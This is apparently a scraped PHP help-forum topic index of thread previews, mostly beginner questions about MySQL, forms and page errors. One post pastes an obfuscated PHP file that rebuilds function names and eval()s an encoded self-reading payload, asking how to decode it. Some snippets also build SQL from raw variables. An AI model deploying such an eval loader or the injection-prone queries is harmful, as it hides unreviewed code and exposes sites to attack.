39,316 Topics

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Member Avatar for nonshatter

Hi all, Is it possible to use the same javascript code in a while loop? The first record that is pulled from the database displays the javascript counter. Yet on the second iteration of the while loop (a new record pulled from the database), the javascript just seems to get …

Member Avatar for diafol
Member Avatar for weizpyr

Im trying to find out what are the most optimal steps in web devlopment. I largely work alone, on relatively small applications and spend a few months on a project. Kindly suggest me if these steps are right: [B]1. Making prototype [/B] using html or image editor [B]2. Designing the …

Member Avatar for weizpyr
Member Avatar for nonshatter

What features does PHP/MySQL provide to deal with concurrent systems? E.g, If I have a table, and I only want to allow one user to update at any one time. I want to put a lock on the database until the update is complete, then once that request is processed, …

Member Avatar for nonshatter
Member Avatar for Mestika

Hi, I’m currently trying to develop a method to get a overview of all my different web templates I’ve created and (legally) downloaded over the years. I thought about a displaying them like Wordpress is previewing it’s templates view a small preview windows, displaying the concrete file with styles and …

Member Avatar for mschroeder
Member Avatar for freedompeace

Well, um... Up to now I've been using a free host to do all my PHP messing around, and I've decided to purchase a decent web host and get serious. I previously had a great deal of help with securing my MySQL queries so that they wouldn't be injected, and …

Member Avatar for saad.khalid
Member Avatar for dmkc

Hi guys, I have a link in my php page that looks like the following: [code] <?php echo "<a href=hotel-map.php?id=$pid>Map Details</a>"; ?>[/code] Although instead of the "map details" text I want an image there... can someone tell me how I'd do this please? I can't seem to find anything around …

Member Avatar for dmkc
Member Avatar for Krstevski

Hello friends, I have problem with MODx, I want to create multiply blog... One blog and one page something like a front page. Do it possible to make this ? If it possible, how to do this ? Thanks.

Member Avatar for pritaeas
Member Avatar for 4789787

Ok so this game works perfectly fine on my own windows test box webserver but when I upload it to my website it doesnt work at all, It gives me the error in this php script, and iv determined the problem lies in the HTTP Referer method used, so is …

Member Avatar for colweb
Member Avatar for preetg

Hi everyone i am using Window XP, mozila firefox, and php 4.1 i made php project for my final year exams...now this is not runing.. my project consist menu that list out all the options. this menu is in javascript and css. where i developed that project runing properly.. but …

Member Avatar for rajarajan2017
Member Avatar for k2k

i am thinking to use php to read plain text... and draw graph. what is the best approach? i googled and found JpGraph which looks kinda cool.. not sure if it is commonly used though.

Member Avatar for furqan219
Member Avatar for roostr

I have the name of a php file stored in the database and i need to call that name and display that file on the current page. The code below tries to display a page called "$lay" [code=php] <? $q = "select layout from HomeUser where username = '$username'"; $lay …

Member Avatar for roostr
Member Avatar for jhbalaji

Hi, I got a file and it contain the following codes! Is it possible to decode them [CODE]<?php /* Leave the File asap! */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14}.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=3140;eval($OOO0000O0('aWYoITApJE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwME8wMCgkTzAwME8wTzAwLDEwMjQpOyRPME8wMDBPMDAoJE8wMDBPME8wMCw0MDk2KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMzgwKSwnVEZhMkcrM3Byc2dqeG5tTWNOUGZEcTVCWUUvQWJTOFdoZWtIOUpPaVJMNEtkd1ZveVVRSXU3Q3Y2MXRaMGxYej0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'));return;?> sGlMx2FMx2FMx27JbOqiBvsJb3UeYCDRs7lWN9JxNqlWsQyksQrVsGlMfIFMxG0yxa6ksQrdsGlMfITyx2FMxah9fulMx2Tyx2FMgaNMxG0yxGlMx2TRsG0yx2FMxG0yxay9fu0yxG0yx2TygPyiqGEex9bKxvFQbCS4831wf5nmD3EGbfqa5DDoc5sfm+SRE5wrmDLM/qsxnGw9S7Eo8qqNPBDvcvYCxBN/x3UY8HuijaSFc9nGNDEpPGJgPuUnf9lcDqsfq+q5q7eE5O+kYCNJEOSR/5LKA37VAvFUbinuSBEv8pJtx2GQxIc7nHb6mPdosQ9LgfwOYCUobCDRsG0yx2FMxG0yxa9ZEBEeAah9fu0yxG0yxG0ygfd=2cLOS51HS3JoAkFkS5JdE++fgaNebirdspqQAGqVYCl9EqNRE5ulxP9naidnaOEobOqeYChRs3+QbkFebQT9/Cq1Mf69SO+dS5DLrTugsp+ISprhjHuhgaN7bOU+AOnoE3qD/3qwMfuUgPTzs3wJ8P6iMPbVSBsdE51HACNJgaNCY5U7EP9VsQYimkT9/Cq1jkblsQ69SO+dS5DVsQYimyugbiNQ/5uRsp+ISprdsQYigfdnaisJSpqQAkT9bBnubHdnaiunaOE7AOnu/5lVr3SJSG+9E3lVD3lIS+FQACnJbvxRs3+O/5UJjaNHAC1uE51uDpsJgcug8yugspnUA2uiDuqxNDnDraRhNJsMfPFeE3NoAiximyugs3+9EpsJbI7TABJIb5UWbBqJbi9RspnUAa9Z2cLv/3JdEPh9Y5N9bOqHMDFw8BnUA+lOEBNH/+lebvnoYQh9Y5N9bOqIgP9h2cLZ2cR9/51HBCELA3qVY57Jr2uhsC+9E3lVbQ0ijkNeE3NQE5nAsCSQAvqyEOldE3qQs7uVsQ0ijkNeE3NQE5nAsC+9E3lVEOldE3qQs7uVsQlLAOndS5NJbQ0ijkNeEOJdEfdnakN7bOUWb3lIS+lO/5UJr2uhsCeuSpTtjQ0ijkNWDuqPq9qP57n+DJE+DJlmcD7+BP6ijvseb+leE37LAk0ijkNLAOnWEOJdE51eA5DZ2cR9AiqwE3luE3lubQTlr3noS51ug3q6b3UoE3DRsQ0ijaNWDuqPq9qP57FrD+lfNDU3BP9LjfrZ2cR9E3lubIuisIdnaOEobkTRs39lx2d9/fy9AiqwE3luE3lubId9/PdKgPFZ2cR9E3lubQTlraN9AvNIjkbVjk0imyugWcugspqQA+lyAvnuBCELA3qWYCeJYCdhMPT9E3lubQ6ibO+yBC+9A5JVjQbVs3JVY7lO/5UJAO+wEfdnaOJOraeO/5UJBCq6/BnubQh9SBsdBvFobvNWEOJdEqlH/3qH/Q9LrTug8yug/51HApq9EPh9SBsdBvFobvNWEOJdEqlH/3qH/Q9Z2cLl2cLl2cLQEBN7bO6hs3noAiNJAiNcbODZ2cLl2cLLEkTRr5E7AOnu/5lVBCq6/BnubQhiECqubOqwAvNJYClVS3qVSpnYSpsesQ9LrpdnaOE7AOnu/5lVr3SJSpsJA5luE5noAiNJAiNI5pNQYPh9qBsdD3+u/G+VEGE7AOnu/5lVfO+wEPy9b3+QY57IM5+QbO+1gaSHAC1usIuXsQbLgcug8yugspFebO+wbvnubkTlr3s7/5U9DqxRspFebO+wbQ9Z2cR9YChhMPFHSBsdBCJV/BcRgfdnaOn7bOUWbCquAvFugaNH/aU2qqsxf7FDB7qPfay9qBsdD3+u/G+VEGE7AOnu/5lVfO+wEP9Z2cLLEkTRspFebO+wbQGlsQbLrTug8yugYvqQA+lIEBNobpcRs3nRjGnqD9UMD+NWDGlfqaUHAvqVSah9b3+QY57IgP9Z2cLHSBsdBvnJS3lySah9YChdc7qPfGlcq+lcf7nDN9J+fGNfjaNyYBseABnISprLmyugWcugYvqQA+lIEBNobpcRs3nRjGnqD9UMD+NWPGqFNGqPj2TLmyugYvqQA+lIEBNobpcRs3nRjGnqD9UMD+NWD9qDqqsmq+sFfJn3NqrdSps7EP9Z2cR9b3+iEPTlr3n7bOUWEBeJYQh9YChLmyugYvqQA+lHA3lIEPh9YChLmyugbOquSBsVraNyY5SJmyugWcugWcug/5YRs3JVbvNeA3UyYBNRraGlrabobO+yBC+9A5JVjQbL2cLZ2cR9bv+dMPSfNDU+c7chgkF3D9lnr3+9E3lVbQbZ2cR9Y5N9bOqIMDFw8BnUA+lUS5qQ8Ph9bv+dgfdnaiSR/5UJgaNeE3NQE5xlc371bv+dBCEJS3nRBC+IbClHgaNeE3NQEBxLgPTnaidnakNLAOnWEOJdE51eA5DhMPTiY5N9AC1IjQbVs3+9EpsJY7diEvsoSBFOACU9EBriBP6ijQbVs3+9EpsJY7diY5N9AC1OACU9EBriBP6ijvnJSpNLAOSIjiFRbabZ2cLT/51HApq9EPT9/51HBCELA3qVY57Jmyugs3JVY7lO/5UJAO+wEPTlraSeE3NoAixosQ69Y5N9bOqH5QSibOl7b3EoA3NJbkSSjkbosQ69Y5N9bOqH5QSeE3NoAOEoA3NJbkSSjkboEiqVYvNLAC1IjiFRbabZ2cLT/51HApq9EPT9/51HBCELA3qVY57JmyugWcugW5qdbCDh8yug/5YhgaNWDuqfDuJMfJdibOqi/BnuEBsJEaSSraGlr2GL2cLZ2cR9SBsdr2uhsCeuSpTtjQlQYBFLE3+HS3JoAiFQACELSpxVYClwjCULYCqVbCDoA3JHE51IEqlybOlHEBnIjiFRbabZ2cR9bOqIbaTlr3SJSpsJA5luE5noAiNJAiNI5pNQYPh9SBsdj3+QbO+1gaSLbablMkNWDuqPq9qP5QSPND7MqGqWcDNGDkSSjaS7bOyiMf69B7n+DJE+DJdiDuqPq9qPBu1FfDDiBPyib3+1b3+dsIuXs3+QAvSAsvFe8BFeAaSSjaSCEBriMf69YBsoS7diSOqQs7uLgfdnaOJOgaNQEBnyMfu1gcug8yugspn1b7lyYBJyY5ylsQbZ2cR9bv+dr2uhrJqcNG+DNPFeE37LAkFfNqchb3+1b3+dr2uhsQNI8BnWb3+1b3+dsyugac9saqSrNqs+r3NoA5+LAkTlrab9bvJIBCNoA5+LAkbkmyugspsJbCl7bOnJr2uhABJIb5UWbBqJbi9RraNIb5yhgfdnakN7bOyhMPTi/pNub2Rojvseb3J9Y5nu/5lVbpsoEOJubQ1HACuoA3JHE51IEPld/5nJAinJBCJIbvqJjiFRbabZ2cR9E3+I/+lHAC1uE51ubI7iEBNQE57oS3qHAC1uE51ub7eubOGRspqQAa9Z2cLJYCeoraN9YBnRBCnoAiNJAiNImyugEBeLSaTRgfdnai7JApnJrpdnakNWDuqfDuJMfJdibOqi/BnuEBsJEaSSr2uhgaNQEBnyMfuUgPTzxPTtr2ThmyugWcugWcugWcug [/CODE]

Member Avatar for freedompeace
Member Avatar for BlueCharge

Hello Everyone, I am currently working on a gaming website and am currently trying to parse the friends page on Xbox.com. Unfortuntaley though i thought that if i logged into xbox.com and then tried going to the page i made it would work, i was wrong. So i need to …

Member Avatar for roostr

I am getting the error: Parse error: syntax error, unexpected T_STRING on line 9 and I cannot figure out why. [code=php] <? session_start(); include("dbconf.php"); include("login.php"); if(isset($_COOKIE['cookname']) && isset($_COOKIE['cookpass'])){ setcookie("cookname", "", time()-60*60*24*365, "\"); setcookie("cookpass", "", time()-60*60*24*365, "\"); } if(!$logged_in){ echo "You are not logged in. Please log in and then log …

Member Avatar for roostr
Member Avatar for theMuffin

I am totally a newbie.. here is the code i have it working on another site or two but now it won't work here.. what am I doing wrong? <?php //we need to set a var to find what page we are on $pageOn = basename($_SERVER['PHP_SELF']); //this is used for …

Member Avatar for theMuffin
Member Avatar for furqan219

I have 100 records in My DB. I want to show 10 and then add another field in the record as UPDATE and then show these 10 as printer friendly.

Member Avatar for diafol
Member Avatar for jeeter19

Hi I'm just trying to input two string variables into 2 fields of a database that are VarChars. [CODE] $name = "jear"; $pass = "jartt2"; $query = 'INSERT INTO `user` (`id`, `name`, `password`, `char_name`) VALUES (NULL, '$name', '$pass', 'test')'; $result = mysql_query($query); [/CODE] This is the snippet of code that …

Member Avatar for jeeter19
Member Avatar for whitestream6

This is my code, as seen here: [url]http://pcafansa6.hosticks.com/episode1.php[/url] [CODE]<?php /*********************************** * PhpMyCoder Paginator * * Created By PhpMyCoder * * 2010 PhpMyCoder * * ------------------------------- * * You may use this code as long * * as this notice stays intact and * * the proper credit is given to …

Member Avatar for whitestream6
Member Avatar for danielagaba

hi i have a piece of code that creates and inserts content in a csv file. is their script that i can use to save the csv file in a predefined folder in my file system without a prompt?

Member Avatar for dmkc

Hi everyone, Ok, what I want to do is display a url that's stored in my database within an iframe when the specific record is selected. The code I had to display the record correctly is: [code] <?php $conn = mysql_connect(HOST,USER,PASS); $db = mysql_select_db("***") or die( "Unable to select database"); …

Member Avatar for dmkc
Member Avatar for manolisvl46

[CODE]$uploaddir = $_SERVER['DOCUMENT_ROOT'].'/bla/bla/uploads/'; $file = $uploaddir . basename($_FILES['uploadfile']['name']); $data = file_get_contents($uploaddir . $_FILES["uploadfile"]["name"]); $data=split("[;\r]",$data); include_once("processes.php"); $ldapconn=connectToDB(); $info["cn"] = $data[$c]; echo "|onoma-->"; echo $info["cn"] ; $c++; $info["sn"] = $data[$c]; echo "|epwnimo-->"; echo $info["sn"] ; $info["objectclass"][0] = "top"; $info["objectclass"][1] = "organizationalPerson"; $r = ldap_add($ldapconn, "cn=".$info['cn'].",cn=............,ou=.......,ou=......,ou=.....,dc=...,dc=gr", $info); [/CODE] so i get the attributes …

Member Avatar for manolisvl46
Member Avatar for bhakti.thakkar

hello all, i have a php page in which user added certain combinations and clicks on add. when added, i create a array which stores the values and user can add multiple rows. if ($action=="Add") { $Arr[] = array ( "scopeid" => $scopeid, // values are comma seperated e.g 1,5,6 …

Member Avatar for sid_prajapati
Member Avatar for danimal132

I uploaded a windows program (.exe) to my windows server. I now need to execute it and pass through a parameter using PHP.. how would i do this? On my computer i would just do this throught the command line, so i not sure how to go about this with …

Member Avatar for danimal132
Member Avatar for sallecpt

hey guys. I have two MySQL tables. I'll try to keep it short :-/ Basically I'd like to join these tables, and get the data from the database. Not here's the detailed info. I usually use the JOIN function, but this time, no join statement does the job. Neither LEFT, …

Member Avatar for furqan219
Member Avatar for jeepguy

I accidentally posted in the wrong section of the forum... [URL="http://www.daniweb.com/forums/thread279411.html"]http://www.daniweb.com/forums/thread279411.html[/URL] Im trying to use php echo to display domaincom (with no dot in between) and can't figure it out. [CODE]<?php echo(preg_replace('/^[a-z]*./','',$_SERVER["HTTP_HOST"])); ?>[/CODE] works to display domain.com but I need domaincom

Member Avatar for pritaeas
Member Avatar for vibhaJ

Hi all, i want php code which will add website's logo in user's uploaded doc file. So whenever that doc file is downloaded from website logo appears at top. How can i achieve this in windows/Linux both. any help will be appreciated.

Member Avatar for colweb
Member Avatar for muralibobby2015

hello... i am doing registration form .in this without submit form can i get alert box....email already exists using javascript. can any body tell me. thnks.

Member Avatar for rajarajan2017
Member Avatar for itisnot_me

Warning: array_sum() [function.array-sum]: The argument should be an array in pdf.php on line 112 i am getting this error and i dont see what the problem is. it calls values and adds them [CODE]$result = mysql_query("SELECT * FROM sold_produce WHERE invoice_id='$invoice_id' "); while($myrow = mysql_fetch_assoc($result)) { $total2[] = $myrow['total']; } …

Member Avatar for rajarajan2017
Member Avatar for niths

hi all, i am having a user table in which userid and username are present. i had a delete button also. so wen i click on the delete button that person details only should get delete. so all i had done. I can delete the information using 'userid'. how can …

Member Avatar for rajarajan2017
Member Avatar for lovepowermannet

I have two systems krulu with them in this google phpbb lovepowerman.net All right adense seems that my other blog if you google lovepowerman.com adense not seem to mind the wisdom what causes yicem pls help

Member Avatar for sallecpt

The End.